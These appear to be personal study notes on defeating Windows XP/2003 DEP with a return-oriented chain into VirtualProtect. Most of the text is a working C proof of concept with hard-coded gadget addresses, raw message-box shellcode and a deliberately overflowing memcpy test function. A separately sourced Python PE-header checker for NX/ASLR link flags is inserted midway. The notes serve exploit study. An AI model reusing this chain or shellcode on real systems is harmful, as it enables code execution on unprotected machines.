First of all, Windows 2003 has DEP enabled by default, which is why people usually use 2003 for these experiments.
Today I turned DEP on in XP and ran the experiment there; it comes to the same thing.
These are just my study notes.

Another method: ret2libc into NtSetInformationProcess to turn DEP off.
BOOL VirtualProtect(
    LPVOID lpAddress,       // start of the target region: the start address of the memory holding the shellcode
    DWORD dwSize,           // size of the region: the size of the shellcode
    DWORD flNewProtect,     // requested protection: 0x40 = PAGE_EXECUTE_READWRITE
    PDWORD lpflOldProtect   // receives the old protection: any writable address
);
Returns non-zero on success and 0 if the change fails.
Summary first:
First, it is normally the return address that gets overwritten. Because software DEP is really SafeSEH, the gadgets have to come from executable modules!!!
!searchcode jmp esp can show the module attributes; you need that when hunting for specific code under DEP!!!
The example in the book overwrites the return address, and the vulnerable function is changed from strcpy to memcpy, because memcpy does not stop at "\x00".
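Added example, not part of these notes: a Python check of the DllCharacteristics bits in a module's PE optional header, which are the per-module attributes behind the !searchcode output mentioned above. It reports whether an image was linked with /NXCOMPAT and /DYNAMICBASE, the two properties a defender checks to know whether DEP applies to the image and whether hard-coded addresses like 7C80997D stay valid across reboots; the PE header it parses is constructed inline as test data.

```python
import struct

IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040  # linked with /DYNAMICBASE (ASLR)
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100     # linked with /NXCOMPAT (DEP-compatible)


def pe_mitigation_flags(image: bytes) -> dict:
    """DOS header -> PE signature -> COFF header -> optional header, then read DllCharacteristics."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # COFF: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes)
    opt_size = struct.unpack_from("<HHIIIHH", image, coff)[5]
    opt = coff + 20
    magic = struct.unpack_from("<H", image, opt)[0]
    if magic not in (0x10B, 0x20B) or opt_size < 72:
        raise ValueError("unsupported optional header")
    # DllCharacteristics is at offset 70 in both PE32 (0x10B) and PE32+ (0x20B)
    dllchars = struct.unpack_from("<H", image, opt + 70)[0]
    return {
        "pe32plus": magic == 0x20B,
        "nx_compat": bool(dllchars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "dynamic_base": bool(dllchars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
    }


def audit(image: bytes) -> list:
    """Findings a reviewer would raise about how a module was linked."""
    f = pe_mitigation_flags(image)
    findings = []
    if not f["nx_compat"]:
        findings.append("no /NXCOMPAT: an EXE without this bit is not opted into DEP by its header")
    if not f["dynamic_base"]:
        findings.append("no /DYNAMICBASE: fixed load base, so its code addresses are predictable")
    return findings


def build_test_image(dllchars: int) -> bytes:
    """Constructed minimal PE32 header (test data only, not a loadable binary)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew: PE signature follows the DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)  # i386, PE32-sized optional header
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    struct.pack_into("<H", opt, 70, dllchars)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)
```

To run it on a real file, pass open(path, "rb").read() to audit() instead of the constructed header.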
#include "stdafx.h"
#include <windows.h>

char shellcode[] =
// 180 bytes of NOP padding: fills str[176] plus the saved EBP
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
// PS: with this method the OllyDbg plugin cannot find the addresses quickly; use !searchcode jmp esp
// 7C80997D 58 pop eax ; ret   (return address)
"\x7d\x99\x80\x7c"
// Address = 7C92E7D9
// Message = Found: POP ESI POP EBX POP EDI RETN at 0x7c92e7d9 Module: C:\WINDOWS\system32\ntdll.dll
"\xd9\xe7\x92\x7c" // ESP, EBP and EAX must not be modified here
// Address = 7D760702
// Message = Found: PUSH ESP POP EBP RET 4 at 0x7d760702 Module: C:\WINDOWS\system32\shell32.dll
"\x02\x07\x76\x7d"
// 7C92120F C3 retn
"\x0f\x12\x92\x7c"
"\x90\x90\x90\x90"
"\xc6\xc6\xeb\x77" // 77EBC6C6 push esp ; jmp eax
"\xff\x00\x00\x00" // size of the memory region to change
"\x40\x00\x00\x00" // new protection: read/write/execute (PAGE_EXECUTE_READWRITE)
"\xc6\xc6\xeb\x77" // 77EBC6C6 push esp ; jmp eax
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
/*
7C801AD9 FF75 14      push dword ptr ss:[ebp+0x14]
7C801ADC FF75 10      push dword ptr ss:[ebp+0x10]
7C801ADF FF75 0C      push dword ptr ss:[ebp+0xC]
7C801AE2 FF75 08      push dword ptr ss:[ebp+0x8]
7C801AE5 6A FF        push -0x1
7C801AE7 E8 75FFFFFF  call kernel32.VirtualProtectEx */
"\xd9\x1a\x80\x7c"
"\x90\x90\x90\x90"
// 7C8369F0 FFD4 call esp
"\xf0\x69\x83\x7c"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
// shellcode:
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53"
"\x68\x64\x61\x30\x23"
"\x68\x23\x50\x61\x6E"
"\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8"; // 168 bytes of shellcode

void test()
{
    char str[176];
    memcpy(str, shellcode, 420); // overflow: 420 bytes copied into a 176-byte buffer
}

int main(int argc, char* argv[])
{
    HINSTANCE hInst = LoadLibrary("shell32.dll"); // load shell32 so its gadget is mapped
    char temp[200];
    test();
    return 0;
}
This method is awkward to use. Let me see whether it can be pushed further... the problem is that strcpy truncates at null bytes.